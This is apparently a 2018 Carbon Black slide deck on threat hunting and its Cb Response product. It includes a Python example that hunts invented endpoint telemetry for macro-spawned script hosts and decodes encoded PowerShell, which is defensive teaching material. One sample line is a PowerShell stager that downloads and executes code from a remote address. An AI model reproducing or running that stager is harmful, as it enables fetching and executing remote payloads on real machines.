I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL1
Threat Hunting: Fast and easy with CbR
1-Oct-18
Nagaraj Hebbar
Technical Account Manager – Middle East, Turkey & Africa (META)

CISSP, CISM
Agenda
01. Threat & Threat hunting - Overview
02. Cb Response
03. Threat hunting demo
NON-MALWARE ATTACKS ON THE RISE
47% of breaches use malware; 53% of breaches are non-malware.
Malware attacks: known, unknown, ransomware, obfuscated.
Non-malware attacks: in-memory, macros, remote login, PowerShell.
93% of researchers say non-malware attacks pose more business risk than malware.
[Chart: malware attacks vs. non-malware attacks vs. malware + non-malware]
Threat vs. Vulnerability vs. Risk
• Threat
  • Anything that can exploit a vulnerability, intentionally or accidentally, and obtain, damage, or destroy an asset
  • A threat is what we are trying to protect against
• Vulnerability
  • A weakness or gap in a security program that can be exploited by a threat to gain unauthorized access to an asset
  • A vulnerability is a weakness or gap in our protection efforts
• Risk
  • The potential for loss, damage or destruction of an asset as a result of a threat exploiting a vulnerability
  • Risk is the intersection of assets, threats and vulnerabilities
Proactive Threat Hunting
WHAT IS IT?
• A proactive and iterative search for attacks that existing detections have missed
• Informed by in-depth knowledge of your environment
• Often hypothesis-based: state what an attacker would have to do, then query the recorded endpoint data for it
WHAT IS IT NOT?
• Out-of-the-box detection
• A checklist of indicators of compromise
• Applying 3rd-party threat intel feeds
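As an added example (not Carbon Black code and not Cb Response's query syntax), this is what a hypothesis-based hunt of the kind described above looks like when run over endpoint process telemetry. It tests two hypotheses drawn from the non-malware vectors on the earlier slide: an Office application spawning a script host (macro abuse, found by rebuilding parent/child lineage from the parent PID), and PowerShell launched with an encoded command, which the hunt decodes so the analyst sees the payload rather than a base64 blob. The event schema, hostnames, users, PIDs and command lines are all constructed for the example; any EDR that records process starts with parent PID and command line can feed the same logic.

```python
"""Hypothesis-driven hunt over constructed endpoint process telemetry.
H1: an Office app should never be the parent of a script host (macro abuse).
H2: PowerShell launched with -EncodedCommand; decode the payload for the analyst.
The schema, hosts, users, PIDs and command lines are invented for this example
and are not Cb Response's event format.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed stager, the way a malicious macro would hand it to PowerShell.
STAGER_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"

def encode_powershell(command: str) -> str:
    """-EncodedCommand takes base64 of the command text encoded as UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")

FIELDS = ("host", "user", "pid", "ppid", "process", "cmdline")
# Constructed process-start events; SRV-DB01 is the benign admin case.
SAMPLE_EVENTS: List[dict] = [dict(zip(FIELDS, row)) for row in [
    ("WS-0412", "CORP\\alice", 3980, 900, "explorer.exe", "explorer.exe"),
    ("WS-0412", "CORP\\alice", 4120, 3980, "WINWORD.EXE",
     '"C:\\Program Files\\Microsoft Office\\WINWORD.EXE" invoice.docm'),
    ("WS-0412", "CORP\\alice", 4388, 4120, "powershell.exe",
     "powershell.exe -NoP -W Hidden -Enc " + encode_powershell(STAGER_COMMAND)),
    ("WS-0412", "CORP\\alice", 5012, 3980, "chrome.exe", "chrome.exe"),
    ("SRV-DB01", "CORP\\svc_backup", 812, 640, "powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
    ("WS-0077", "CORP\\bob", 2200, 2100, "EXCEL.EXE", "EXCEL.EXE budget.xlsm"),
    ("WS-0077", "CORP\\bob", 2310, 2200, "wscript.exe",
     "wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\upd.vbs"),
]]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

def hunt_office_spawning_script_host(events: List[dict]) -> List[dict]:
    """H1: script host whose parent (same host, by ppid) is an Office app."""
    parents = {(e["host"], e["pid"]): e for e in events}  # rebuild lineage
    hits = []
    for e in events:
        parent = parents.get((e["host"], e["ppid"]))
        if parent is None:
            continue  # parent predates the recording; lineage unknown
        if parent["process"].lower() in OFFICE_APPS and e["process"].lower() in SCRIPT_HOSTS:
            hits.append(e)
    return hits

# Matches -e, -ec, -enc and -EncodedCommand. PowerShell accepts any unambiguous
# prefix, so a production rule should also cover the forms in between.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # flag present but payload is not a real encoded command

def hunt_encoded_powershell(events: List[dict]) -> List[dict]:
    """H2: PowerShell with an encoded command; attach the decoded payload."""
    hits = []
    for e in events:
        if e["process"].lower() in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(e["cmdline"])
            if decoded is not None:
                hits.append({**e, "decoded": decoded})
    return hits

HUNTS = {"office_spawns_script_host": hunt_office_spawning_script_host,
         "encoded_powershell": hunt_encoded_powershell}

def run_hunts(events: List[dict]) -> Dict[str, List[dict]]:
    """Run every hypothesis; a saved watchlist would do this on each new batch."""
    return {name: hunt(events) for name, hunt in HUNTS.items()}

def hosts_to_triage(results: Dict[str, List[dict]]) -> List[str]:
    """Hosts with at least one hit, for the analyst to pivot into."""
    return sorted({e["host"] for hits in results.values() for e in hits})

if __name__ == "__main__":
    res = run_hunts(SAMPLE_EVENTS)
    for name, hits in res.items():
        print(name, [(h["host"], h["pid"], h.get("decoded", h["cmdline"])) for h in hits])
    print("triage:", hosts_to_triage(res))
```

Running it flags the two user workstations and leaves the scheduled backup job on SRV-DB01 alone, because that PowerShell has neither an Office parent nor an encoded command. The unknown-parent case is skipped deliberately: with only a partial recording you cannot judge lineage, and guessing produces noise. Before a hunt like this is promoted to a standing watchlist, its hits should be baselined against the organization's known admin tooling, otherwise the watchlist becomes the kind of unfiltered alert source hunting is meant to replace.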
The Challenges
• No real-time visibility into advanced attacks
• Tired of being reactive
• No centralized access to unfiltered data
91% of organizations report increases in speed and accuracy of response due to threat hunting.
77% consider endpoint security data necessary in their threat hunting feeds.
Source: The Hunter Strikes Back: The SANS 2017 Threat Hunting Survey
How We Solve Those Challenges
Advances you from monitoring to proactive threat hunting
✓ Stops the headline breach
✓ Scales the hunt
✓ Integrates your defenses
✓ Gives you a community of experts
Detect & Respond Faster with Cb Response
Endpoint Security Market Leader
• 30 of Fortune 100
• 3,700 customers
• 14M endpoints
• 13,000 practitioners
• 75+ IR/MSSPs
• 60%+ Y/Y growth
PURPOSE BUILT FOR SOC/IR • MARKET-LEADING DETECTION & RESPONSE • PRO-ACTIVE THREAT HUNTING
Cb Response: IR & Threat Hunting
• Complete visibility
• Proactive threat hunting
• Real-time response
• Global community leverage
Complete Visibility
Continuous and centralized recording of process, registry, file and network activity on every endpoint
• Capture all endpoint activity
• Identify root cause
• Aggregate threat intel
• Visualize the attack
• Minimize resource impact
Proactive Threat Hunting
• Customize watchlists
• Capture all endpoint activity
• Consolidate threat feeds
• Open APIs and integrations
Make the next attack harder; automate the hunt; integrate defenses; stop the "headline" breach; leverage community experts
Real-Time Response
Custom banning, endpoint isolation, live response and process termination
• Remediate infected devices
• Isolate infected systems
• Prevent future attacks
• Collect forensic data
Market-Leading IR & Threat Hunting
1. Complete visibility
2. Proactive threat hunting
3. Real-time response
4. Proven at scale
THANK YOU

Threat Hunting and EDR Event: Carbon Black Presentation